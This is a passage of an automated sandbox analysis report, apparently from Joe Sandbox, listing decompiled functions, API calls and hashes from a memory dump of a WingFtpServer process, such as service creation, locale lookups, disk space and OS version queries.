                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce8d4eed4cb4b6681d14a9cbdded61462dbb9bebad735c9e59beabd6a3225f84
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4319136A00B18AFEF20DB5CDD81BEEB7BAFB48711F5004E6A509A7250D7355E80CB10
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03BC48BC Relevance: 4.6, APIs: 3, Instructions: 58serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                                  			E03BC48BC(void* __ebx, void* __esi, char _a4, intOrPtr _a8) {
				short* _t13;
				void* _t16;
				void* _t22;
				intOrPtr _t28;
				intOrPtr _t34;

				E03AA9D00(_a4);
				E03AA9D00(_a8);
				_push(_t34);
				_push(0x3bc4952);
				_push( *[fs:eax]);
				 *[fs:eax] = _t34;
				_t22 = OpenSCManagerW(0, 0, 0xf003f);
				if(_t22 != 0) {
					_t13 = E03AAA8E4(_a8);
					_t16 = CreateServiceW(_t22, _t15, E03AAA8E4(_a4), 0xf01ff, 0x10, 2, 1, _t13, 0, 0, 0, 0, 0);
					if(_t16 != 0) {
						CloseServiceHandle(_t16);
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E03BC4959);
				return E03AA9C7C( &_a4, 2);
			}








                                                                                                                                                                                                  0x03bc48c4
                                                                                                                                                                                                  0x03bc48cc
                                                                                                                                                                                                  0x03bc48d3
                                                                                                                                                                                                  0x03bc48d4
                                                                                                                                                                                                  0x03bc48d9
                                                                                                                                                                                                  0x03bc48dc
                                                                                                                                                                                                  0x03bc48ed
                                                                                                                                                                                                  0x03bc48f1
                                                                                                                                                                                                  0x03bc4904
                                                                                                                                                                                                  0x03bc4922
                                                                                                                                                                                                  0x03bc4929
                                                                                                                                                                                                  0x03bc4930
                                                                                                                                                                                                  0x03bc4935
                                                                                                                                                                                                  0x03bc4929
                                                                                                                                                                                                  0x03bc4939
                                                                                                                                                                                                  0x03bc493c
                                                                                                                                                                                                  0x03bc493f
                                                                                                                                                                                                  0x03bc4951

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,03BC4952), ref: 03BC48E8
                                                                                                                                                                                                  • CreateServiceW.ADVAPI32(00000000,00000000,00000000,000F01FF,00000010,00000002,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000F003F), ref: 03BC4922
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateManagerOpenService
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2847155433-0
                                                                                                                                                                                                  • Opcode ID: 27b20fc004f7adb82a5ef17ea397ecc9b3aeab86afd4051c83d0798f7ce4eb4b
                                                                                                                                                                                                  • Instruction ID: fa93d1837f57cd26f665c7899aa9db3d1726527e39a62887ef81efcfe85a8114
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27b20fc004f7adb82a5ef17ea397ecc9b3aeab86afd4051c83d0798f7ce4eb4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC01B1343447587EEB31EA65CDA2F7A369CEB05B54F4044BABA048F281D7E19900D150
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC1A8C Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC1A8C(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E03AAB9D8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E03AAB9D8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                                                                                                                                                  0x03ac1a93
                                                                                                                                                                                                  0x03ac1a98
                                                                                                                                                                                                  0x03ac1a9a
                                                                                                                                                                                                  0x03ac1a9a
                                                                                                                                                                                                  0x03ac1aad
                                                                                                                                                                                                  0x03ac1abc
                                                                                                                                                                                                  0x03ac1abf
                                                                                                                                                                                                  0x03ac1acc
                                                                                                                                                                                                  0x03ac1acf
                                                                                                                                                                                                  0x03ac1ad4
                                                                                                                                                                                                  0x03ac1ad7
                                                                                                                                                                                                  0x03ac1ad9
                                                                                                                                                                                                  0x03ac1ae6
                                                                                                                                                                                                  0x03ac1ae9
                                                                                                                                                                                                  0x03ac1aee
                                                                                                                                                                                                  0x03ac1af1
                                                                                                                                                                                                  0x03ac1af3
                                                                                                                                                                                                  0x03ac1afc

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 03AC1AAD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                                                                  • Opcode ID: 4d8a231a1b0a35ada5d110049613a4ef5684ce43ac64f28b3d71d46a3984b020
                                                                                                                                                                                                  • Instruction ID: 0c550ecf703a779532d681fb37a0b8919adc1d1a4158a41b0f954600e42cef94
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8a231a1b0a35ada5d110049613a4ef5684ce43ac64f28b3d71d46a3984b020
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E01112B5E00209AFDB00CF99C980DEFF7F9EFC8200B14C55AA504EB354E7319A018BA0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC5770 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC5770(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E03AA9FFC(_t10, _t18);
				}
				return E03AA9DA4(_t10, _t5 - 1,  &_v516, _t19);
			}








                                                                                                                                                                                                  0x03ac577b
                                                                                                                                                                                                  0x03ac577d
                                                                                                                                                                                                  0x03ac578e
                                                                                                                                                                                                  0x03ac5793
                                                                                                                                                                                                  0x03ac5795
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03ac57ad
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 03AC578E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 641e8bd2acaab8f9e22919a6daffd8ea871d01c6b1355c71d316d619ffbd55fc
                                                                                                                                                                                                  • Instruction ID: 621adfdd179f9d40e7519bd6a4cf758417613f380adc5fd4626bb377db58771d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 641e8bd2acaab8f9e22919a6daffd8ea871d01c6b1355c71d316d619ffbd55fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5E0D836B1031857D714E55D9DC4AFB726C9B49200F00456FB905CB352EF61AD9083E4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC9A54 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E03AC9A54(void* __edx) {
				intOrPtr _t2;
				intOrPtr _t7;
				void* _t11;
				intOrPtr _t13;
				void* _t14;
				void* _t15;

				_t11 = __edx;
				if(__edx != 0) {
					_t15 = _t15 + 0xfffffff0;
					_t2 = E03AA832C(_t2, _t14);
				}
				_t13 = _t2;
				E03AA7C40(0);
				 *((intOrPtr*)(E03AB04B0() + 0x10)) = _t13;
				EnumSystemLocalesW(E03AC982C, 2);
				_t7 = _t13;
				if(_t11 != 0) {
					E03AA8384(_t7);
					_pop( *[fs:0x0]);
				}
				return _t13;
			}









                                                                                                                                                                                                  0x03ac9a54
                                                                                                                                                                                                  0x03ac9a58
                                                                                                                                                                                                  0x03ac9a5a
                                                                                                                                                                                                  0x03ac9a5d
                                                                                                                                                                                                  0x03ac9a5d
                                                                                                                                                                                                  0x03ac9a64
                                                                                                                                                                                                  0x03ac9a6a
                                                                                                                                                                                                  0x03ac9a74
                                                                                                                                                                                                  0x03ac9a81
                                                                                                                                                                                                  0x03ac9a86
                                                                                                                                                                                                  0x03ac9a8a
                                                                                                                                                                                                  0x03ac9a8c
                                                                                                                                                                                                  0x03ac9a91
                                                                                                                                                                                                  0x03ac9a98
                                                                                                                                                                                                  0x03ac9a9f

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(03AC982C,00000002,?,?,03AC9DBD,03AC5C3A,?,00000000,03AC5C7B,?,?,?,00000000,00000000), ref: 03AC9A81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                  • Opcode ID: bbe9b779cafa6830073add8cdb16842d9f78abcdd241c0a1f20d49ed683890e5
                                                                                                                                                                                                  • Instruction ID: a069cd299da2e9db5800812d84f2fafb47bc73d63f0ccc23fa597a94d761709d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe9b779cafa6830073add8cdb16842d9f78abcdd241c0a1f20d49ed683890e5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEE0266B740B6057C220F7BC1E41B9B79486F40AE1F0C427BE958CF356EB5A480102E2
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC57BC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                  			E03AC57BC(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}






                                                                                                                                                                                                  0x03ac57bf
                                                                                                                                                                                                  0x03ac57c0
                                                                                                                                                                                                  0x03ac57d6
                                                                                                                                                                                                  0x03ac57de
                                                                                                                                                                                                  0x03ac57d8
                                                                                                                                                                                                  0x03ac57d8
                                                                                                                                                                                                  0x03ac57d8
                                                                                                                                                                                                  0x03ac57e4

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,03AC58BE,?,00000001,00000000,03AC5ACD), ref: 03AC57CF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 25fc4d03bd949ec20625e873c3f046b4167cdf7abd19845558ab449262b0b4b0
                                                                                                                                                                                                  • Instruction ID: c260aea311e76752a77ebfcda51908abc0f1e87eb71cd758e55de81c3a34a2ec
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25fc4d03bd949ec20625e873c3f046b4167cdf7abd19845558ab449262b0b4b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ADD0A7AA3193647AE224D25B6D44DB756EDCBC67B1F14483FBA4CCA201E250CC45C3B0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC3AA0 Relevance: 1.5, APIs: 1, Instructions: 22timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E03AC3AA0(long long __fp0) {
				long long _v8;
				struct _SYSTEMTIME _v24;
				void* _t16;
				long long* _t21;
				void* _t22;
				long long _t23;

				_t23 = __fp0;
				GetLocalTime( &_v24);
				E03AC38DC(_v24.wYear & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _t22, __fp0);
				_v8 = _t23;
				asm("wait");
				_t16 = E03AC3738(_v24.wHour & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMinute & 0x0000ffff, _t22, _t23, _v24.wMilliseconds & 0x0000ffff);
				 *_t21 = _t23 + _v24.wSecond;
				asm("wait");
				return _t16;
			}









                                                                                                                                                                                                  0x03ac3aa0
                                                                                                                                                                                                  0x03ac3aa8
                                                                                                                                                                                                  0x03ac3abc
                                                                                                                                                                                                  0x03ac3ac1
                                                                                                                                                                                                  0x03ac3ac5
                                                                                                                                                                                                  0x03ac3adb
                                                                                                                                                                                                  0x03ac3ae4
                                                                                                                                                                                                  0x03ac3ae7
                                                                                                                                                                                                  0x03ac3aee

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                                                                  • Opcode ID: 695b59b07bf36285b79b48761728cfd50cd60a03eebf0123057a166caa4fe613
                                                                                                                                                                                                  • Instruction ID: a5eb274a92824edc87a43fca52b8345e00c3c49f5a09e778c40a8012f1a418b3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 695b59b07bf36285b79b48761728cfd50cd60a03eebf0123057a166caa4fe613
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AE0A564408662A1C244EF56C94043EB7E5BEC5A42F408C4EF8D4442E1EA38C4A8E367
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC7C84 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC7C84() {
				char _v256;
				intOrPtr _v260;
				intOrPtr _t3;
				intOrPtr _t4;
				intOrPtr _t5;
				int _t6;
				struct _OSVERSIONINFOW* _t11;

				_t3 =  *0x3bd6808; // 0xa
				 *0x3bd6950 = _t3;
				_t4 =  *0x3bd680c; // 0x0
				 *0x3bd6954 = _t4;
				_t5 =  *0x3bd6804; // 0x42ee
				 *0x3bd6958 = _t5;
				_t11->dwOSVersionInfoSize = 0x114;
				_t6 = GetVersionExW(_t11);
				if(_t6 != 0) {
					 *0x3bd694c = _v260;
					_t6 = E03AAA99C(0x3bd695c, 0x80,  &_v256);
				}
				 *0x3bd06d8 = 1;
				return _t6;
			}










                                                                                                                                                                                                  0x03ac7c8a
                                                                                                                                                                                                  0x03ac7c8f
                                                                                                                                                                                                  0x03ac7c94
                                                                                                                                                                                                  0x03ac7c99
                                                                                                                                                                                                  0x03ac7c9e
                                                                                                                                                                                                  0x03ac7ca3
                                                                                                                                                                                                  0x03ac7ca8
                                                                                                                                                                                                  0x03ac7cb0
                                                                                                                                                                                                  0x03ac7cb7
                                                                                                                                                                                                  0x03ac7cbd
                                                                                                                                                                                                  0x03ac7cd0
                                                                                                                                                                                                  0x03ac7cd0
                                                                                                                                                                                                  0x03ac7cd5
                                                                                                                                                                                                  0x03ac7ce2

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?,03AC7D10,00000000,03AC7D28,?,?,03AC7D42,03BACA5C,?,00000000,00000000,00000000,?,?,00000000,?), ref: 03AC7CB0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Version
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                                                                  • Opcode ID: f33cb8d630889bfe69d5fe1ad124468240044efa437b9f26a0210438ef360762
                                                                                                                                                                                                  • Instruction ID: adcb051cbfee878459986fc83a43e2d8fd3399e60de5806d3a7fea7dd347a31a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f33cb8d630889bfe69d5fe1ad124468240044efa437b9f26a0210438ef360762
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24F030B49073418FC384EF28E755750BBE0E748308FC4082AD885C7748F77A9864CB62
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AC9848 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AC9848(int __eax, void* __ecx, int __edx) {
				short _v2052;
				void* _t6;
				void* _t12;

				_t6 = __ecx;
				_v2052 = 0;
				GetLocaleInfoW(__eax, __edx,  &_v2052, 0x400);
				return E03AAA99C(_t6, 0x400, _t12);
			}






                                                                                                                                                                                                  0x03ac984f
                                                                                                                                                                                                  0x03ac9851
                                                                                                                                                                                                  0x03ac9863
                                                                                                                                                                                                  0x03ac987d

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000400,?,03AC98ED,?,00000000,03AC9A1C,?,?,?,?,00000000,00000000), ref: 03AC9863
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
